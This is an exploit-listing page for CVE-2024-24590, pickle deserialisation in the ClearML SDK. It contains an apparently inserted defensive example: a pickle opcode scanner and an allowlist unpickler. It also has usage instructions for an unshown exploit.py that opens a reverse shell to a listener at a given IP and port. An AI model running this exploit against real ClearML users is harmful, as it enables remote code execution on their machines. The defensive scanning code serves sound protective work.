## https://sploitus.com/exploit?id=B6CA1893-92D8-5A57-A10D-CBE61936D739
# CVE-2024-24590
Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.
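The root cause is that an artifact is deserialised with Python's `pickle`, which can import modules and call functions while loading. The following is an added defensive example, not code from this PoC or from ClearML: it disassembles a pickle stream with `pickletools` without executing it, reports the opcodes and globals that can trigger code, and then loads only through an `Unpickler` whose `find_class` enforces an allowlist. The allowlist contents, the function names, and the sample artifacts are all constructed for the example.

```python
"""Inspect a pickle-serialised artifact before loading it (added example)."""
import collections
import io
import pickle
import pickletools

# Opcodes that let a pickle import a module or invoke a callable while loading.
# Assumption: this triage list is ours, not taken from ClearML or the PoC.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}
STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
                  "STRING", "SHORT_BINSTRING", "BINSTRING"}
# Hypothetical allowlist of "module.name" globals an artifact may reference.
ALLOWED_GLOBALS = {"collections.OrderedDict", "builtins.set"}


def scan_pickle(data: bytes) -> dict:
    """Static pass over the stream (nothing is executed). Returns the risky
    opcodes found and the globals referenced via GLOBAL / STACK_GLOBAL.
    Memo tracking resolves module/name strings pushed earlier with GET."""
    risky, globals_seen, strings, memo, last = [], [], [], {}, None
    for op, arg, pos in pickletools.genops(data):
        name = op.name
        if name == "GLOBAL":                      # protocol <= 3: "module name"
            module, _, attr = arg.partition(" ")
            globals_seen.append(f"{module}.{attr}")
        elif name == "STACK_GLOBAL" and len(strings) >= 2:
            globals_seen.append(f"{strings[-2]}.{strings[-1]}")
        if name in RISKY_OPCODES:
            risky.append((pos, name))
        # Minimal memo model so a BINGET of a memoised string is recognised.
        if name in STRING_OPCODES:
            last = arg
            strings.append(arg)
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            if isinstance(last, str):
                strings.append(last)
        elif name == "MEMOIZE":
            memo[len(memo)] = last
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        else:
            last = None
    return {"risky": risky, "globals": globals_seen}


class RestrictedUnpickler(pickle.Unpickler):
    """Runtime gate: every global lookup must be on the allowlist."""
    def find_class(self, module, name):
        if f"{module}.{name}" in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def load_artifact(data: bytes):
    """("ok", obj) if the static scan and the restricted load both pass,
    otherwise ("rejected", reason) without having run anything from it."""
    report = scan_pickle(data)
    denied = sorted(set(report["globals"]) - ALLOWED_GLOBALS)
    if denied:
        seen = sorted({n for _, n in report["risky"]})
        return "rejected", f"disallowed globals {denied}; opcodes {seen}"
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:   # defence in depth if the scan missed one
        return "rejected", str(exc)


# --- constructed sample artifacts (test fixtures, not real ClearML data) ---
class _ReduceProbe:
    """Stands in for an artifact whose load calls a callable; here the
    callable is the harmless builtin sorted() so the probe is safe to run."""
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


def benign_artifact() -> bytes:
    return pickle.dumps({"accuracy": 0.93, "labels": [1, 2, 3]})


def allowed_artifact() -> bytes:
    return pickle.dumps(collections.OrderedDict([("a", 1)]))


def probe_artifact(protocol=None) -> bytes:
    return pickle.dumps(_ReduceProbe(), protocol=protocol)


if __name__ == "__main__":
    print("plain pickle.loads ran the callable:", pickle.loads(probe_artifact()))
    print("scan:", scan_pickle(probe_artifact()))
    print("restricted:", load_artifact(probe_artifact()))
```

Running the module shows the contrast: plain `pickle.loads` on the probe returns `[1, 2, 3]` because `sorted` was actually called during loading, while `load_artifact` rejects the same bytes before any callable is reached. The static scan is for logging and alerting (its string/memo model is a heuristic); the `find_class` check is the authoritative control, because it sits on the path the unpickler itself uses to resolve every global.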

## Usage
1) Paste the credentials provided and run `clearml-init`.
2) Run the `exploit.py` script in one terminal and have a listener running in another terminal.
3) The exploit may need to be run several times before a reverse shell connects back.

```
usage: exploit.py [-h] -i IP -p PORT -P PROJECT

options:
  -h, --help  show this help message and exit
  -i IP       IP address of the listener
  -p PORT     Port number of the listener
  -P PROJECT  Name of the existing project

example: python exploit.py -i 10.10.14.60 -p 4444 -P 'Black Swan'
```
## Exploit details
1) https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
2) https://www.cvedetails.com/cve/CVE-2024-24590/